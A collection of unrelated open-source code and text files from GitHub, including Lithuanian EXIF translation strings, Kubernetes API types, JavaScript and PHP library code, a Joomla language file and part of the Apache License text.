"exif-subjectdistance-value": "$1 metrų",
"exif-meteringmode-0": "Nežinoma",
"exif-meteringmode-1": "Vidurkis",
"exif-meteringmode-2": "Centruotas vidurkis",
"exif-meteringmode-3": "Taškas",
"exif-meteringmode-4": "Daugiataškis",
"exif-meteringmode-5": "Raštas",
"exif-meteringmode-6": "Dalinis",
"exif-meteringmode-255": "Kita",
"exif-lightsource-0": "Nežinomas",
"exif-lightsource-1": "Dienos šviesa",
"exif-lightsource-2": "Fluorescentinis",
"exif-lightsource-3": "Volframas (kaitinamoji lempa)",
"exif-lightsource-4": "Blykstė",
"exif-lightsource-9": "Giedras oras",
"exif-lightsource-10": "Debesuotas oras",
"exif-lightsource-11": "Šešėlis",
"exif-lightsource-12": "Dienos šviesos fluorescentinis (D 5700 – 7100K)",
"exif-lightsource-13": "Dienos baltumo fluorescentinis (N 4600 – 5400K)",
"exif-lightsource-14": "Šalto baltumo fluorescentinis (W 3900 – 4500K)",
"exif-lightsource-15": "Baltas fluorescentinis (WW 3200 – 3700K)",
"exif-lightsource-17": "Standartinis apšvietimas A",
"exif-lightsource-18": "Standartinis apšvietimas B",
"exif-lightsource-19": "Standartinis apšvietimas C",
"exif-lightsource-24": "ISO studijos volframas",
"exif-lightsource-255": "Kitas šviesos šaltinis",
"exif-flash-fired-0": "Blykstė nemirktelėjo",
"exif-flash-fired-1": "Blykstė mirktelėjo",
"exif-flash-return-0": "jokios blyksčių grįžties aptikimo funkcijos",
"exif-flash-return-2": "blykstės grįžtamoji šviesa neaptikta",
"exif-flash-return-3": "blykstės grįžtamoji šviesa aptikta",
"exif-flash-mode-1": "priverstinė blykstė",
"exif-flash-mode-2": "priverstinis blykstės sulaikymas",
"exif-flash-mode-3": "automatinis režimas",
"exif-flash-function-1": "Be blykstės funkcijos",
"exif-flash-redeye-1": "raudonų akių šalinimo režimas",
"exif-focalplaneresolutionunit-2": "coliai",
"exif-sensingmethod-1": "Nenurodytas",
"exif-sensingmethod-2": "Vienalustis spalvų zonos jutiklis",
"exif-sensingmethod-3": "Dvilustis spalvų zonos jutiklis",
"exif-sensingmethod-4": "Trilustis spalvų zonos jutiklis",
"exif-sensingmethod-5": "Nuoseklusis spalvų zonos jutiklis",
"exif-sensingmethod-7": "Trilinijinis jutiklis",
"exif-sensingmethod-8": "Spalvų nuoseklusis linijinis jutiklis",
"exif-filesource-3": "Skaitmeninis fotoaparatas",
"exif-scenetype-1": "Tiesiogiai fotografuotas vaizdas",
"exif-customrendered-0": "Standartinis procesas",
"exif-customrendered-1": "Pasirinktinis procesas",
"exif-exposuremode-0": "Automatinis išlaikymas",
"exif-exposuremode-1": "Rankinis išlaikymas",
"exif-exposuremode-2": "Automatinis skliaustas",
"exif-whitebalance-0": "Automatinis baltumo balansas",
"exif-whitebalance-1": "Rankinis baltumo balansas",
"exif-scenecapturetype-0": "Paprastas",
"exif-scenecapturetype-1": "Peizažas",
"exif-scenecapturetype-2": "Portretas",
"exif-scenecapturetype-3": "Nakties vaizdas",
"exif-gaincontrol-0": "Jokia",
"exif-gaincontrol-1": "Nedidelis pakėlimas",
"exif-gaincontrol-2": "Didelis pakėlimas",
"exif-gaincontrol-3": "Mažas nuleidimas",
"exif-gaincontrol-4": "Didelis nuleidimas",
"exif-contrast-0": "Paprastas",
"exif-contrast-1": "Mažas",
"exif-contrast-2": "Didelis",
"exif-saturation-0": "Paprastas",
"exif-saturation-1": "Mažas sodrumas",
"exif-saturation-2": "Didelis sodrumas",
"exif-sharpness-0": "Paprastas",
"exif-sharpness-1": "Mažas",
"exif-sharpness-2": "Didelis",
"exif-subjectdistancerange-0": "Nežinomas",
"exif-subjectdistancerange-1": "Makro",
"exif-subjectdistancerange-2": "Artimas vaizdas",
"exif-subjectdistancerange-3": "Tolimas vaizdas",
"exif-gpslatitude-n": "Šiaurės platuma",
"exif-gpslatitude-s": "Pietų platuma",
"exif-gpslongitude-e": "Rytų ilguma",
"exif-gpslongitude-w": "Vakarų ilguma",
"exif-gpsaltitude-above-sealevel": "$1 {{PLURAL:$1| metras | metrai}} virš jūros lygio",
"exif-gpsaltitude-below-sealevel": "$1 {{PLURAL:$1| metras | metrai}} žemiau jūros lygio",
"exif-gpsstatus-a": "Matavimas vykdyme",
"exif-gpsstatus-v": "Matuojamas programinis sąveikumas",
"exif-gpsmeasuremode-2": "Dvimatis matavimas",
"exif-gpsmeasuremode-3": "Trimatis matavimas",
"exif-gpsspeed-k": "Kilometrai per valandą",
"exif-gpsspeed-m": "Mylios per valandą",
"exif-gpsspeed-n": "Mazgai",
"exif-gpsdestdistance-k": "Kilometrai",
"exif-gpsdestdistance-m": "Mylios",
"exif-gpsdestdistance-n": "Jūrmylės",
"exif-gpsdop-excellent": "Puikus ($1)",
"exif-gpsdop-good": "Geras ( $1 )",
"exif-gpsdop-moderate": "Vidutinis ($1)",
"exif-gpsdop-fair": "Prastas ($1)",
"exif-gpsdop-poor": "Blogas ( $1 )",
"exif-objectcycle-a": "Tik ryte",
"exif-objectcycle-p": "Tik vakare",
"exif-objectcycle-b": "Ir ryte ir vakare",
"exif-gpsdirection-t": "Tikroji kryptis",
"exif-gpsdirection-m": "Magnetinė kryptis",
"exif-ycbcrpositioning-1": "Centruotas",
"exif-ycbcrpositioning-2": "Bendras išdėstymas",
"exif-dc-contributor": "Autoriai",
"exif-dc-coverage": "Erdvės ar laiko apimtis",
"exif-dc-date": "Data (-os)",
"exif-dc-publisher": "Leidėjas",
"exif-dc-relation": "Susijusi medija",
"exif-dc-rights": "Teisės",
"exif-dc-source": "Šaltinis",
"exif-dc-type": "Laikmenos tipas",
"exif-rating-rejected": "Atmesta",
"exif-isospeedratings-overflow": "Didesnis už 65535",
"exif-iimcategory-ace": "Menas, kultūra ir pramogos",
"exif-iimcategory-clj": "Nusikalstamumas ir įstatymas",
"exif-iimcategory-dis": "Nelaimės ir nelaimingi atsitikimai",
"exif-iimcategory-fin": "Ekonomika ir verslas",
"exif-iimcategory-edu": "Švietimas",
"exif-iimcategory-evn": "Aplinka",
"exif-iimcategory-hth": "Sveikata",
"exif-iimcategory-hum": "Žmogaus interesai",
"exif-iimcategory-lab": "Darbas",
"exif-iimcategory-lif": "Gyvenimo būdas ir laisvalaikis",
"exif-iimcategory-pol": "Politika",
"exif-iimcategory-rel": "Raligija ir tikėjimas",
"exif-iimcategory-sci": "Mokslas ir technologijos",
"exif-iimcategory-soi": "Socialiniai klausimai",
"exif-iimcategory-spo": "Sportas",
"exif-iimcategory-war": "Karas, konfliktas ir neramumai",
"exif-iimcategory-wea": "Oras",
"exif-urgency-normal": "Normalus ( $1 )",
"exif-urgency-low": "Žemas ( $1 )",
"exif-urgency-high": "Aukštas ( $1 )",
"exif-urgency-other": "Vartotojo nustatyta pirmenybė ($1)"
}
|
{
"pile_set_name": "Github"
}
|
define([
"./core",
"./traversing"
], function( jQuery ) {
// The number of elements contained in the matched element set
jQuery.fn.size = function() {
return this.length;
};
jQuery.fn.andSelf = jQuery.fn.addBack;
});
|
{
"pile_set_name": "Github"
}
|
package com.vladmihalcea.flexypool.model;
import javax.persistence.Entity;
import javax.persistence.Id;
/**
* Book - Book
*
* @author Vlad Mihalcea
*/
@Entity
public class Book {
@Id
private Long id;
private String name;
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
}
|
{
"pile_set_name": "Github"
}
|
//******************************************************************************
//
// Copyright (c) 2015 Microsoft Corporation. All rights reserved.
//
// This code is licensed under the MIT License (MIT).
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
//******************************************************************************
#pragma once
#include "ObjectConverter.h"
enum {
NSLayoutPriorityRequired = 1000,
NSLayoutPriorityDefaultHigh = 750,
NSLayoutPriorityDragThatCanResizeWindow = 510,
NSLayoutPriorityWindowSizeStayPut = 500,
NSLayoutPriorityDragThatCannotResizeWindow = 490,
NSLayoutPriorityDefaultLow = 250,
NSLayoutPriorityFittingSizeCompression = 50,
};
typedef float NSLayoutPriority;
typedef enum {
NSLayoutAttributeLeft = 1,
NSLayoutAttributeRight,
NSLayoutAttributeTop,
NSLayoutAttributeBottom,
NSLayoutAttributeLeading,
NSLayoutAttributeTrailing,
NSLayoutAttributeWidth,
NSLayoutAttributeHeight,
NSLayoutAttributeCenterX,
NSLayoutAttributeCenterY,
NSLayoutAttributeBaseline,
NSLayoutAttributeLastBaseline = NSLayoutAttributeBaseline,
NSLayoutAttributeFirstBaseline,
NSLayoutAttributeLeftMargin,
NSLayoutAttributeRightMargin,
NSLayoutAttributeTopMargin,
NSLayoutAttributeBottomMargin,
NSLayoutAttributeLeadingMargin,
NSLayoutAttributeTrailingMargin,
NSLayoutAttributeCenterXWithinMargins,
NSLayoutAttributeCenterYWithinMargins,
NSLayoutAttributeNotAnAttribute = 0
} NSLayoutAttribute;
typedef enum {
NSLayoutRelationLessThanOrEqual = -1,
NSLayoutRelationEqual = 0,
NSLayoutRelationGreaterThanOrEqual = 1,
} NSLayoutRelation;
class NSLayoutConstraint : public ObjectConverterSwapper {
public:
XIBObject* _firstItem;
XIBObject* _secondItem;
int _firstAttribute;
int _secondAttribute;
int _relation;
float _multiplier;
float _priority;
float _constant;
float _symbolicConstant;
bool _hasSymbolicConstant;
public:
NSLayoutConstraint();
virtual void InitFromXIB(XIBObject* obj);
virtual void InitFromStory(XIBObject* obj);
virtual void Awaken();
virtual void ConvertStaticMappings(NIBWriter* writer, XIBObject* obj);
};
|
{
"pile_set_name": "Github"
}
|
Copyright (c) 2015-Present CloudFoundry.org Foundation, Inc. All Rights Reserved.
This project contains software that is Copyright (c) 2014-2015 Pivotal Software, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This project may include a number of subcomponents with separate
copyright notices and license terms. Your use of these subcomponents
is subject to the terms and conditions of each subcomponent's license,
as noted in the LICENSE file.
|
{
"pile_set_name": "Github"
}
|
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// package v1beta1 is alpha objects from meta that will be introduced.
package v1beta1
import (
"k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
)
// TODO: Table does not generate to protobuf because of the interface{} - fix protobuf
// generation to support a meta type that can accept any valid JSON.
// Table is a tabular representation of a set of API resources. The server transforms the
// object into a set of preferred columns for quickly reviewing the objects.
// +protobuf=false
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type Table struct {
v1.TypeMeta `json:",inline"`
// Standard list metadata.
// More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
// +optional
v1.ListMeta `json:"metadata,omitempty"`
// columnDefinitions describes each column in the returned items array. The number of cells per row
// will always match the number of column definitions.
ColumnDefinitions []TableColumnDefinition `json:"columnDefinitions"`
// rows is the list of items in the table.
Rows []TableRow `json:"rows"`
}
// TableColumnDefinition contains information about a column returned in the Table.
// +protobuf=false
type TableColumnDefinition struct {
// name is a human readable name for the column.
Name string `json:"name"`
// type is an OpenAPI type definition for this column.
// See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for more.
Type string `json:"type"`
// format is an optional OpenAPI type definition for this column. The 'name' format is applied
// to the primary identifier column to assist in clients identifying column is the resource name.
// See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for more.
Format string `json:"format"`
// description is a human readable description of this column.
Description string `json:"description"`
// priority is an integer defining the relative importance of this column compared to others. Lower
// numbers are considered higher priority. Columns that may be omitted in limited space scenarios
// should be given a higher priority.
Priority int32 `json:"priority"`
}
// TableRow is an individual row in a table.
// +protobuf=false
type TableRow struct {
// cells will be as wide as headers and may contain strings, numbers (float64 or int64), booleans, simple
// maps, or lists, or null. See the type field of the column definition for a more detailed description.
Cells []interface{} `json:"cells"`
// conditions describe additional status of a row that are relevant for a human user.
// +optional
Conditions []TableRowCondition `json:"conditions,omitempty"`
// This field contains the requested additional information about each object based on the includeObject
// policy when requesting the Table. If "None", this field is empty, if "Object" this will be the
// default serialization of the object for the current API version, and if "Metadata" (the default) will
// contain the object metadata. Check the returned kind and apiVersion of the object before parsing.
// +optional
Object runtime.RawExtension `json:"object,omitempty"`
}
// TableRowCondition allows a row to be marked with additional information.
// +protobuf=false
type TableRowCondition struct {
// Type of row condition.
Type RowConditionType `json:"type"`
// Status of the condition, one of True, False, Unknown.
Status ConditionStatus `json:"status"`
// (brief) machine readable reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Human readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
type RowConditionType string
// These are valid conditions of a row. This list is not exhaustive and new conditions may be
// included by other resources.
const (
// RowCompleted means the underlying resource has reached completion and may be given less
// visual priority than other resources.
RowCompleted RowConditionType = "Completed"
)
type ConditionStatus string
// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
ConditionTrue ConditionStatus = "True"
ConditionFalse ConditionStatus = "False"
ConditionUnknown ConditionStatus = "Unknown"
)
// IncludeObjectPolicy controls which portion of the object is returned with a Table.
type IncludeObjectPolicy string
const (
// IncludeNone returns no object.
IncludeNone IncludeObjectPolicy = "None"
// IncludeMetadata serializes the object containing only its metadata field.
IncludeMetadata IncludeObjectPolicy = "Metadata"
// IncludeObject contains the full object.
IncludeObject IncludeObjectPolicy = "Object"
)
// TableOptions are used when a Table is requested by the caller.
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type TableOptions struct {
v1.TypeMeta `json:",inline"`
// includeObject decides whether to include each object along with its columnar information.
// Specifying "None" will return no object, specifying "Object" will return the full object contents, and
// specifying "Metadata" (the default) will return the object's metadata in the PartialObjectMetadata kind
// in version v1beta1 of the meta.k8s.io API group.
IncludeObject IncludeObjectPolicy `json:"includeObject,omitempty" protobuf:"bytes,1,opt,name=includeObject,casttype=IncludeObjectPolicy"`
}
// PartialObjectMetadata is a generic representation of any object with ObjectMeta. It allows clients
// to get access to a particular ObjectMeta schema without knowing the details of the version.
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type PartialObjectMetadata struct {
v1.TypeMeta `json:",inline"`
// Standard object's metadata.
// More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
// +optional
v1.ObjectMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
}
// PartialObjectMetadataList contains a list of objects containing only their metadata
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type PartialObjectMetadataList struct {
v1.TypeMeta `json:",inline"`
// items contains each of the included items.
Items []*PartialObjectMetadata `json:"items" protobuf:"bytes,1,rep,name=items"`
}
|
{
"pile_set_name": "Github"
}
|
// Generated by CoffeeScript 1.9.3
var Padding, PaddingBottom, PaddingLeft, PaddingRight, PaddingTop, _Declaration,
extend = function(child, parent) { for (var key in parent) { if (hasProp.call(parent, key)) child[key] = parent[key]; } function ctor() { this.constructor = child; } ctor.prototype = parent.prototype; child.prototype = new ctor(); child.__super__ = parent.prototype; return child; },
hasProp = {}.hasOwnProperty;
_Declaration = require('./_Declaration');
PaddingTop = require('./PaddingTop');
PaddingLeft = require('./PaddingLeft');
PaddingRight = require('./PaddingRight');
PaddingBottom = require('./PaddingBottom');
module.exports = Padding = (function(superClass) {
var self;
extend(Padding, superClass);
function Padding() {
return Padding.__super__.constructor.apply(this, arguments);
}
self = Padding;
Padding.setOnto = function(declarations, prop, originalValue) {
var append, val, vals;
append = '';
val = _Declaration.sanitizeValue(originalValue);
if (_Declaration.importantClauseRx.test(String(val))) {
append = ' !important';
val = val.replace(_Declaration.importantClauseRx, '');
}
val = val.trim();
if (val.length === 0) {
return self._setAllDirections(declarations, append, append, append, append);
}
vals = val.split(" ").map(function(val) {
return val + append;
});
if (vals.length === 1) {
return self._setAllDirections(declarations, vals[0], vals[0], vals[0], vals[0]);
} else if (vals.length === 2) {
return self._setAllDirections(declarations, vals[0], vals[1], vals[0], vals[1]);
} else if (vals.length === 3) {
return self._setAllDirections(declarations, vals[0], vals[1], vals[2], vals[1]);
} else if (vals.length === 4) {
return self._setAllDirections(declarations, vals[0], vals[1], vals[2], vals[3]);
} else {
throw Error("Can't understand value for padding: `" + originalValue + "`");
}
};
Padding._setAllDirections = function(declarations, top, right, bottom, left) {
PaddingTop.setOnto(declarations, 'paddingTop', top);
PaddingTop.setOnto(declarations, 'paddingRight', right);
PaddingTop.setOnto(declarations, 'paddingBottom', bottom);
PaddingTop.setOnto(declarations, 'paddingLeft', left);
};
return Padding;
})(_Declaration);
|
{
"pile_set_name": "Github"
}
|
/*
* Copyright (C) 2017-2018 Team Kodi
* This file is part of Kodi - https://kodi.tv
*
* SPDX-License-Identifier: GPL-2.0-or-later
* See LICENSES/README.md for more information.
*/
#pragma once
#include "cores/RetroPlayer/process/RPProcessInfo.h"
namespace KODI
{
namespace RETRO
{
class CRPProcessInfoX11 : public CRPProcessInfo
{
public:
CRPProcessInfoX11();
static CRPProcessInfo* Create();
static void Register();
};
} // namespace RETRO
} // namespace KODI
|
{
"pile_set_name": "Github"
}
|
/**
* @author : Adarsh Pastakia
* @version : 5.0.0
* @copyright : 2019
* @license : MIT
*/
import { bindable, bindingMode, computedFrom, customElement, inlineView, viewResources } from "aurelia-framework";
import { addMonths, endOfDay, isAfter, isBefore, isSameMonth, startOfDay, startOfMonth } from "date-fns";
import { UIFormat } from "../utils/ui-format";
import { CalendarHead } from "./calendar-head";
import {
buildHeaderConfig,
CALENDAR_VIEWS,
changeMonth,
getTitle,
IDatePreset,
IHeaderConfig,
parseDate,
parseRange
} from "./calendar-utils";
import { DaysPage } from "./days-page";
import { MonthsPage } from "./months-page";
import { TimePage } from "./time-page";
import view from "./ui-range-picker.html";
import { YearsPage } from "./years-page";
@customElement("ui-range-picker")
@inlineView(view)
@viewResources(CalendarHead, DaysPage, MonthsPage, YearsPage, TimePage)
export class UIRangePicker {
@bindable({ defaultBindingMode: bindingMode.twoWay })
public date: [string, string] | string | undefined;
@bindable()
public minDate: string | undefined;
@bindable()
public maxDate: string | undefined;
@bindable()
public format: string = "dd MMM yyyy";
@bindable()
public datePresets: IDatePreset[] = [];
@bindable({ defaultBindingMode: bindingMode.fromView })
public dateLabel: string;
protected startMonth = startOfMonth(new Date());
protected endMonth = startOfMonth(addMonths(new Date(), 1));
protected startPage = CALENDAR_VIEWS.DAYS;
protected endPage = CALENDAR_VIEWS.DAYS;
protected VIEWS = CALENDAR_VIEWS;
protected hilight: Date;
protected selecting: Date;
private selectedDate: [Date, Date];
protected bind() {
this.dateChanged();
}
protected dateChanged() {
this.selectedDate = parseRange(this.date);
if (this.selectedDate) {
this.startMonth = startOfMonth(this.selectedDate[0]);
this.endMonth = startOfMonth(this.selectedDate[1]);
const preset = this.datePresets.find(p => p.preset === this.date);
this.dateLabel = preset
? preset.label
: `${UIFormat.date(this.selectedDate[0], this.format)} ~ ${UIFormat.date(
this.selectedDate[1],
this.format
)}`;
}
}
@computedFrom("selectedDate", "hilight", "selecting", "minDate", "maxDate", "disabledDates")
get config() {
return {
date: this.selecting ? ([this.selecting, this.hilight] as [Date, Date]) : this.selectedDate,
minDate: parseDate(this.minDate),
maxDate: parseDate(this.maxDate),
disabled: []
};
}
@computedFrom("startMonth", "startPage")
get startTitle(): string {
return getTitle(this.startMonth, this.startPage);
}
@computedFrom("endMonth", "endPage")
get endTitle(): string {
return getTitle(this.endMonth, this.endPage);
}
@computedFrom("startMonth", "startPage", "minDate", "maxDate")
get startHeaderOptions(): IHeaderConfig {
return buildHeaderConfig(this.startMonth, this.startPage, {
...this.config,
page: this.startPage
});
}
@computedFrom("endMonth", "endPage", "minDate", "maxDate")
get endHeaderOptions(): IHeaderConfig {
return buildHeaderConfig(this.endMonth, this.endPage, { ...this.config, page: this.endPage });
}
protected startHeaderClicked($event: MouseEvent) {
const target = $event.target as HTMLElement;
if (target.dataset.tool) {
if (target.dataset.tool === CalendarHead.TITLE) {
if (this.startPage !== CALENDAR_VIEWS.YEARS) {
this.startPage++;
}
} else {
this.startMonth = changeMonth(this.startMonth, this.startPage, target.dataset.tool);
if (
isSameMonth(this.startMonth, this.endMonth) ||
isAfter(this.startMonth, this.endMonth)
) {
this.endMonth = addMonths(this.startMonth, 1);
}
}
}
}
protected endHeaderClicked($event: MouseEvent) {
const target = $event.target as HTMLElement;
if (target.dataset.tool) {
if (target.dataset.tool === CalendarHead.TITLE) {
if (this.endPage !== CALENDAR_VIEWS.YEARS) {
this.endPage++;
}
} else {
this.endMonth = changeMonth(this.endMonth, this.endPage, target.dataset.tool);
if (
isSameMonth(this.startMonth, this.endMonth) ||
isBefore(this.endMonth, this.startMonth)
) {
this.startMonth = addMonths(this.endMonth, -1);
}
}
}
}
protected selectDate($event: MouseEvent) {
const target = $event.target as HTMLElement;
if (target.dataset.date) {
const date = new Date(target.dataset.date);
if (this.selecting) {
this.date = isBefore(date, this.selecting)
? [startOfDay(date).toISOString(), endOfDay(this.selecting).toISOString()]
: [startOfDay(this.selecting).toISOString(), endOfDay(date).toISOString()];
this.selecting = null;
} else {
this.selecting = date;
}
}
}
protected selectStartMonth($event: MouseEvent) {
const target = $event.target as HTMLElement;
if (target.dataset.date) {
this.startMonth = new Date(target.dataset.date);
this.startPage--;
if (isSameMonth(this.startMonth, this.endMonth) || isAfter(this.startMonth, this.endMonth)) {
this.endMonth = addMonths(this.startMonth, 1);
}
}
}
protected selectEndMonth($event: MouseEvent) {
const target = $event.target as HTMLElement;
if (target.dataset.date) {
this.endMonth = new Date(target.dataset.date);
this.endPage--;
if (isSameMonth(this.startMonth, this.endMonth) || isBefore(this.endMonth, this.startMonth)) {
this.startMonth = addMonths(this.endMonth, -1);
}
}
}
protected cancelSelection() {
this.selecting = null;
this.startPage = CALENDAR_VIEWS.DAYS;
this.endPage = CALENDAR_VIEWS.DAYS;
}
protected hilightDate($event: MouseEvent) {
const target = $event.target as HTMLElement;
if (target.dataset.date) {
this.hilight = new Date(target.dataset.date);
}
}
protected selectPreset(preset) {
this.cancelSelection();
this.date = preset;
}
}
|
{
"pile_set_name": "Github"
}
|
<?php
namespace EasyCorp\Bundle\EasyAdminBundle\Filter;
use Doctrine\ORM\QueryBuilder;
use EasyCorp\Bundle\EasyAdminBundle\Contracts\Filter\FilterInterface;
use EasyCorp\Bundle\EasyAdminBundle\Dto\EntityDto;
use EasyCorp\Bundle\EasyAdminBundle\Dto\FieldDto;
use EasyCorp\Bundle\EasyAdminBundle\Dto\FilterDataDto;
use EasyCorp\Bundle\EasyAdminBundle\Form\Filter\Type\NumericFilterType;
use EasyCorp\Bundle\EasyAdminBundle\Form\Type\ComparisonType;
/**
* @author Yonel Ceruto <yonelceruto@gmail.com>
* @author Javier Eguiluz <javier.eguiluz@gmail.com>
*/
final class NumericFilter implements FilterInterface
{
use FilterTrait;
public static function new(string $propertyName, $label = null): self
{
return (new self())
->setFilterFqcn(__CLASS__)
->setProperty($propertyName)
->setLabel($label)
->setFormType(NumericFilterType::class)
->setFormTypeOption('translation_domain', 'EasyAdminBundle');
}
public function apply(QueryBuilder $queryBuilder, FilterDataDto $filterDataDto, ?FieldDto $fieldDto, EntityDto $entityDto): void
{
$alias = $filterDataDto->getEntityAlias();
$property = $filterDataDto->getProperty();
$comparison = $filterDataDto->getComparison();
$parameterName = $filterDataDto->getParameterName();
$parameter2Name = $filterDataDto->getParameter2Name();
$value = $filterDataDto->getValue();
$value2 = $filterDataDto->getValue2();
if (ComparisonType::BETWEEN === $comparison) {
$queryBuilder->andWhere(sprintf('%s.%s BETWEEN :%s and :%s', $alias, $property, $parameterName, $parameter2Name))
->setParameter($parameterName, $value)
->setParameter($parameter2Name, $value2);
} else {
$queryBuilder->andWhere(sprintf('%s.%s %s :%s', $alias, $property, $comparison, $parameterName))
->setParameter($parameterName, $value);
}
}
}
|
{
"pile_set_name": "Github"
}
|
// Code generated by client-gen. DO NOT EDIT.
package fake
import (
clientset "github.com/aquasecurity/starboard/pkg/generated/clientset/versioned"
aquasecurityv1alpha1 "github.com/aquasecurity/starboard/pkg/generated/clientset/versioned/typed/aquasecurity/v1alpha1"
fakeaquasecurityv1alpha1 "github.com/aquasecurity/starboard/pkg/generated/clientset/versioned/typed/aquasecurity/v1alpha1/fake"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/watch"
"k8s.io/client-go/discovery"
fakediscovery "k8s.io/client-go/discovery/fake"
"k8s.io/client-go/testing"
)
// NewSimpleClientset returns a clientset that will respond with the provided objects.
// It's backed by a very simple object tracker that processes creates, updates and deletions as-is,
// without applying any validations and/or defaults. It shouldn't be considered a replacement
// for a real clientset and is mostly useful in simple unit tests.
func NewSimpleClientset(objects ...runtime.Object) *Clientset {
o := testing.NewObjectTracker(scheme, codecs.UniversalDecoder())
for _, obj := range objects {
if err := o.Add(obj); err != nil {
panic(err)
}
}
cs := &Clientset{tracker: o}
cs.discovery = &fakediscovery.FakeDiscovery{Fake: &cs.Fake}
cs.AddReactor("*", "*", testing.ObjectReaction(o))
cs.AddWatchReactor("*", func(action testing.Action) (handled bool, ret watch.Interface, err error) {
gvr := action.GetResource()
ns := action.GetNamespace()
watch, err := o.Watch(gvr, ns)
if err != nil {
return false, nil, err
}
return true, watch, nil
})
return cs
}
// Clientset implements clientset.Interface. Meant to be embedded into a
// struct to get a default implementation. This makes faking out just the method
// you want to test easier.
type Clientset struct {
testing.Fake
discovery *fakediscovery.FakeDiscovery
tracker testing.ObjectTracker
}
func (c *Clientset) Discovery() discovery.DiscoveryInterface {
return c.discovery
}
func (c *Clientset) Tracker() testing.ObjectTracker {
return c.tracker
}
var _ clientset.Interface = &Clientset{}
// AquasecurityV1alpha1 retrieves the AquasecurityV1alpha1Client
func (c *Clientset) AquasecurityV1alpha1() aquasecurityv1alpha1.AquasecurityV1alpha1Interface {
return &fakeaquasecurityv1alpha1.FakeAquasecurityV1alpha1{Fake: &c.Fake}
}
|
{
"pile_set_name": "Github"
}
|
<FindBugsFilter>
<Match>
<Or>
<Class name="~.*\.R\$.*" />
<Class name="~.*Test" />
<Class name="~.*Test\$.*" />
<Class name="~.*\.Manifest\$.*" />
</Or>
</Match>
</FindBugsFilter>
|
{
"pile_set_name": "Github"
}
|
; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8
PLG_FIELDS_CALENDAR="Fields - Calendar"
PLG_FIELDS_CALENDAR_DEFAULT_VALUE_LABEL="Default Date"
PLG_FIELDS_CALENDAR_DEFAULT_VALUE_DESC="This is the default date. The value can be an ISO 8601 format (YYYY-MM-DD HH:MM:SS) or NOW, which displays the actual date."
PLG_FIELDS_CALENDAR_LABEL="Calendar (%s)"
PLG_FIELDS_CALENDAR_PARAMS_SHOWTIME_DESC="If enabled, the calendar field expects a date and time and will also display the time. The formats are localised using the regular language strings."
PLG_FIELDS_CALENDAR_PARAMS_SHOWTIME_LABEL="Show Time"
PLG_FIELDS_CALENDAR_XML_DESCRIPTION="This plugin lets you create new fields of type 'calendar' in any extensions where custom fields are supported."
|
{
"pile_set_name": "Github"
}
|
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
